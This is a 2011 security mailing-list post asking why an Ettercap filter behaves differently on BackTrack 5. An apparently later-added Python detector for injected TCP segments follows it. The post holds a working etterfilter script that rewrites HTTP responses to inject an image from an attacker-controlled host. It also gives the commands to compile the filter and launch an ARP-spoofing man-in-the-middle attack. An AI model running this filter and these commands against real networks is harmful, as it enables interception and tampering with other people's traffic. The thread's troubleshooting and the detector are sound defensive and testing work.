PaulDotCom mailing list archives

Ettercap + Etterfilter weirdness on BT5


From: Joshua Wright <jwright () hasborg com>
Date: Wed, 15 Jun 2011 08:13:59 -0400

Has anyone successfully used Ettercap with a filter on BT5?

On BT4R2, this script works like a champ:

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "If-Modified-Since")) {
      replace("Accept-Encoding", "If-PACified-Since");
      msg("Killed If-Modified-Since\n");
   }
}
if (ip.proto == TCP && tcp.src == 80) {
   replace("img src=", "img src=\"http://10.10.10.70/pwned.jpg\"; ");
   msg("pwned image injected\n");
}

# etterfilter -o pwned.ef pwned.filter
# ettercap -TqM arp:remote -F pwned.ef // //

In testing with BT5 however, I see the logging messages, and the packets
are injected by Ettercap, but the original frames are not dropped.  I
validated this on the victim where he gets the original packets
immediately followed by the Ettercap-modified packets.  The follow-up
packets are dropped by the victim as TCP retransmissions.

I confirmed this behavior on BT5 VM and booting from a DVD natively.

I'm guessing this is due to something having changed in the kernel from
BT4R2 to BT5, but I'm not sure what it could be.  I checked
/sys/net/ipv4/ip_forward, but it is set to 0.  Any other suggestions?

Thanks,

-Josh
_______________________________________________
Pauldotcom mailing list
Pauldotcom () mail pauldotcom com
http://mail.pauldotcom.com/cgi-bin/mailman/listinfo/pauldotcom
Main Web Site: http://pauldotcom.com
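The symptom Josh describes (the victim receives the original segment and then a rewritten copy with the same TCP sequence number, which the stack discards as a retransmission) is also the signal a defender can alert on. A genuine retransmission repeats the same bytes at the same sequence offset; an injected copy carries different bytes. The following is an added example for this thread, not code from the post or from the Ettercap project: a small detector over constructed segment records that flags same-flow, same-sequence segments whose overlapping bytes differ, while ignoring byte-identical and coalesced retransmissions. Flow tuples, sequence numbers and payloads are made up for the example; only the 10.10.10.70 image URL is taken from the filter above.

```python
"""Flag TCP segments that collide with an earlier segment in the same flow
but carry different content at the same sequence offset.

Added example, not part of the mailing-list post. All segment records are
constructed by hand; in practice they would come from a capture.
"""
from dataclasses import dataclass
from typing import Dict, List, Tuple

FlowKey = Tuple[str, int, str, int]


@dataclass(frozen=True)
class Segment:
    src: str
    sport: int
    dst: str
    dport: int
    seq: int
    payload: bytes


def flow_key(seg: Segment) -> FlowKey:
    """Identify a unidirectional flow by its address/port four-tuple."""
    return (seg.src, seg.sport, seg.dst, seg.dport)


def find_payload_collisions(segments: List[Segment]):
    """Return (flow, seq, first_payload, later_payload) for each segment that
    reuses a sequence number already seen in its flow with different bytes.

    Only the bytes both segments cover are compared, so a retransmission that
    coalesces more data onto the same starting offset (same prefix, longer
    payload) is not reported; a rewritten copy whose prefix diverges is.
    """
    first_seen: Dict[Tuple[FlowKey, int], bytes] = {}
    alerts = []
    for seg in segments:
        key = (flow_key(seg), seg.seq)
        earlier = first_seen.get(key)
        if earlier is None:
            first_seen[key] = seg.payload
            continue
        overlap = min(len(earlier), len(seg.payload))
        if earlier[:overlap] != seg.payload[:overlap]:
            alerts.append((flow_key(seg), seg.seq, earlier, seg.payload))
    return alerts


# Constructed sample: an HTTP response, then a rewritten copy at the same
# sequence number (the pattern the post describes on the victim), then a
# byte-identical retransmission and a coalesced retransmission, which are
# both benign.
SAMPLE_SEGMENTS = [
    Segment("10.10.10.5", 80, "10.10.10.20", 51234, 1000,
            b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><img src=/logo.png></html>"),
    Segment("10.10.10.5", 80, "10.10.10.20", 51234, 1000,
            b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n"
            b"<html><img src=\"http://10.10.10.70/pwned.jpg\"; /logo.png></html>"),
    Segment("10.10.10.5", 80, "10.10.10.20", 51235, 5000, b"abc"),
    Segment("10.10.10.5", 80, "10.10.10.20", 51235, 5000, b"abc"),
    Segment("10.10.10.5", 80, "10.10.10.20", 51236, 7000, b"hello"),
    Segment("10.10.10.5", 80, "10.10.10.20", 51236, 7000, b"hello world"),
]


if __name__ == "__main__":
    for flow, seq, before, after in find_payload_collisions(SAMPLE_SEGMENTS):
        print(f"content collision in {flow} at seq {seq}:")
        print(f"  first: {before!r}")
        print(f"  later: {after!r}")
```

The check is deliberately narrow: it reports only the case where two segments claim the same sequence offset with different bytes, which is what a client sees when an in-path rewrite is applied without the original frame being dropped. It does not by itself distinguish a tool like Ettercap from any other source of conflicting segments, so it is best used as an indicator to correlate with ARP-table changes or duplicate-address alerts on the same segment.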